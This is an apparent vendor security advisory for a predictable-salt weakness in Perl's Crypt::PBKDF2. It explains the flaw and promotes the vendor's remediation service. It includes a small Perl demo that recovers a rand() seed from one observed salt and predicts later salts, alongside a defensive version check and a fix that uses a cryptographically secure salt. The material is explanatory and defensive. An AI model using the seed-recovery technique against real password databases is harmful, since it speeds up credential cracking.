CVE-2026-9638: Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts
Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography.
Metrics
- CVSS v3.1: 7.5
- Severity: HIGH
- Fixed in: 0.261630
- Affected Products: 1
HarborGuard Analysis
Synopsis
An insecure random number generation vulnerability affects Crypt::PBKDF2 for Perl in versions before 0.261630. The library uses Perl's built-in rand function to generate password-hashing salts. rand is a deterministic pseudo-random generator seeded from a small amount of state, and Perl's own documentation states that it is not cryptographically secure, so the salts it produces are predictable and identically seeded processes emit identical salts. The CVSS vector scores the weakness as reachable over the network with no authentication or user interaction, but exploitation presupposes that the attacker has obtained stored hashes (for example from a leaked database); predictable or repeated salts then let the attacker reuse precomputed work across many hashes and accelerate recovery of plaintext passwords. Note that a PBKDF2 salt is stored in the clear alongside the hash, so the problem is its low entropy and predictability, not that it has been exposed. A patched-image rebuild at version 0.261630 is available on HarborGuard for environments running an affected version.
HarborGuard Coverage
- Detection: Available. Vulnerability data is ingested from upstream feeds within minutes of publication and matched against customer registry images and CI/CD pipeline images, including custom-built images that bundle Crypt::PBKDF2.
- Triage: Available. HarborGuard scores this CVE at CVSS 7.5 (HIGH) and weights it against each environment's compliance policy to determine urgency. Triage findings are routable to the appropriate team inbox within each customer organization based on policy configuration.
- Remediation: Available. A patched-image rebuild at Crypt::PBKDF2 version 0.261630 becomes available on HarborGuard for any image found to carry an affected version. For customers who opt into auto-remediation, HarborGuard performs the rebuild, runs regression tests, and opens a pull request against affected workloads.
Exploit Conditions
- Network reachability: Required
The attacker must be able to reach the service over the network; any internet-exposed or internally networked service using this library is in scope.
- Authentication: Not required
No account or credential is needed to exploit the weakness; the attack targets the predictability of salts produced by the library, not a protected endpoint.
- Victim interaction: Not required
No user action is required; exploitation is passive and relies entirely on the attacker's ability to observe or obtain stored password hashes.
- Attack complexity: Low (AC:L)
Once hashed values are obtained the attack is reliable and needs no special conditions: the predictability of rand-derived salts is a deterministic property of the affected library versions, with no environmental dependencies.
Blast Radius
- An attacker who obtains stored hashes already holds each salt, since Crypt::PBKDF2 stores the salt in the hash string; the damage is that salts drawn from rand come from a deterministic generator with a small seed, so an attacker who learns or guesses the generator state can anticipate salts, and identically seeded processes produce identical salts. This removes much of the per-password work factor a salt is meant to impose and accelerates brute-force or dictionary attacks to recover plaintext passwords.
- Recovered plaintext passwords expose user credentials stored or processed by any application relying on Crypt::PBKDF2 for password hashing, and any password reused elsewhere.
- Confidentiality of password material protected by this library is rated as fully compromised (CVSS C:H); integrity and availability of the host system are not directly affected by this vulnerability.
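The predictability described under Exploit Conditions and Blast Radius, shown as an added example that is not code from Crypt::PBKDF2 or HarborGuard: it builds a 16-byte salt from rand() in the style the advisory describes, recovers the seed from a single observed salt by searching candidate seeds, and then replays the generator to predict the salt the next account would receive. The seed value 4242, the searched range and the 16-byte length are constructed for the demo; Perl's own documentation states that rand() is not cryptographically secure, which is the property being exploited.

```perl
#!/usr/bin/env perl
# Added example (not from Crypt::PBKDF2 or HarborGuard): why a salt built from
# Perl's rand() is predictable. Assumptions: 16-byte salts, a demo seed range,
# and a victim process whose rand() seed falls inside that range.
use strict;
use warnings;

# Salt construction in the style the advisory describes: one rand() byte per
# position. This mirrors the weakness; it does not call the module itself.
sub rand_salt {
    my ($len) = @_;
    return join '', map { chr(int(rand(256))) } (1 .. $len);
}

# Replay: seed the generator and emit $count salts of $len bytes in order.
sub salts_from_seed {
    my ($seed, $count, $len) = @_;
    srand($seed);
    return map { rand_salt($len) } (1 .. $count);
}

# Given one observed salt, search candidate seeds until one reproduces it.
# A real attacker would cover the whole seed space; the range is kept small
# here so the demo runs in well under a second. Returns undef if not found.
sub recover_seed {
    my ($observed, $max_seed) = @_;
    my $len = length $observed;
    for my $seed (1 .. $max_seed) {
        srand($seed);
        return $seed if rand_salt($len) eq $observed;
    }
    return undef;
}

# --- constructed scenario -------------------------------------------------
# The victim process seeds rand() with a guessable value (explicit here so the
# run is reproducible; an unseeded process is seeded by the interpreter from a
# small amount of state, which is the root of the weakness).
my $victim_seed = 4242;
my ($salt_user1, $salt_user2) = salts_from_seed($victim_seed, 2, 16);
# $salt_user1 is what ends up, base64-encoded, inside user1's stored hash;
# $salt_user2 is the salt the next account created will get.

# Attacker: sees user1's stored hash, pulls out the salt, recovers the seed
# from the salt alone, then predicts every salt that follows.
my $found = recover_seed($salt_user1, 10_000);
die "seed not found in demo range\n" unless defined $found;
printf "recovered seed: %d (victim used %d)\n", $found, $victim_seed;

my (undef, $predicted_user2) = salts_from_seed($found, 2, 16);
printf "user2 salt   : %s\n", unpack('H*', $salt_user2);
printf "predicted    : %s\n", unpack('H*', $predicted_user2);
print $predicted_user2 eq $salt_user2
    ? "next salt predicted correctly\n"
    : "prediction failed\n";
```

The search cost is one rand_salt() per candidate seed, so it scales linearly with the seed space rather than with the 2^128 a uniformly random 16-byte salt would require; that gap, not the seed value chosen here, is the point.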
How HarborGuard Handles This
Available on HarborGuard: detection of this CVE is matched against images in customer registries and pipelines within minutes of publication, covering both upstream base images and custom images that bundle Crypt::PBKDF2. Where a fix version is identified (0.261630), a patched-image rebuild becomes available immediately. For customers who opt into auto-remediation, HarborGuard performs the rebuild, runs a regression test suite, and opens a pull request against affected workloads. The median time from CVE publication to merged patch PR for high-severity issues is around 90 minutes for environments with auto-remediation enabled. Where compliance policy permits, this flow runs automatically; otherwise, the rebuilt image and PR are staged for manual approval.
Fix available
- ARODLAND / Crypt::PBKDF2: affected < 0.261630 (from 0); fixed in 0.261630
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
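A check and an interim mitigation, as an added example that is not part of the advisory or the module: it compares the installed $Crypt::PBKDF2::VERSION against the fixed version named above and supplies generate() with a salt read from /dev/urandom, so that even an unpatched host does not store a rand()-derived salt. It assumes Crypt::PBKDF2 is installed and a Unix-like host with /dev/urandom; the password, iteration count and hash parameters are constructed sample values. Upgrading to 0.261630 remains the fix; an explicit salt only covers the code paths you control.

```perl
#!/usr/bin/env perl
# Added example (not code from Crypt::PBKDF2 or HarborGuard): flag an affected
# install and bypass the library's own salt generation with a CSPRNG salt.
use strict;
use warnings;
use Crypt::PBKDF2;

my $fixed_version = 0.261630;   # fixed version named in the advisory

# Returns 1 if the given module version predates the fix, 0 otherwise.
sub is_affected {
    my ($installed) = @_;
    return ($installed < $fixed_version) ? 1 : 0;
}

# Reads $len bytes from the kernel CSPRNG. Assumption: a Unix-like host with
# /dev/urandom; elsewhere substitute a CSPRNG module such as Crypt::URandom.
sub csprng_salt {
    my ($len) = @_;
    open my $fh, '<:raw', '/dev/urandom' or die "cannot open /dev/urandom: $!";
    my $got = read $fh, my $salt, $len;
    close $fh;
    die "short read from /dev/urandom\n" unless defined $got && $got == $len;
    return $salt;
}

# Constructed parameters; tune iterations to your hardware budget.
my $pbkdf2 = Crypt::PBKDF2->new(
    hash_class => 'HMACSHA2',
    hash_args  => { sha_size => 256 },
    iterations => 100_000,
    salt_len   => 16,   # only used when the library picks the salt itself
);

my $installed = $Crypt::PBKDF2::VERSION;
if (is_affected($installed)) {
    warn "Crypt::PBKDF2 $installed is older than $fixed_version: "
       . "library-generated salts come from rand(); supplying explicit salts\n";
}

# Passing the salt as the second argument to generate() bypasses the library's
# salt generation, so the stored string carries a CSPRNG salt on any version.
my $password = 'correct horse battery staple';   # constructed sample
my $hash     = $pbkdf2->generate($password, csprng_salt(16));
print "$hash\n";

# Verification is unchanged: validate() parses the salt back out of the
# stored string, so hashes made with explicit salts remain compatible.
print $pbkdf2->validate($hash, $password) ? "valid\n" : "INVALID\n";
print $pbkdf2->validate($hash, 'wrong')   ? "BUG: wrong password accepted\n"
                                          : "rejected wrong password\n";
```

Hashes already on disk that were created by an affected version keep their rand-derived salts; rehash those users on their next successful login so that the weak salt is replaced rather than merely no longer produced.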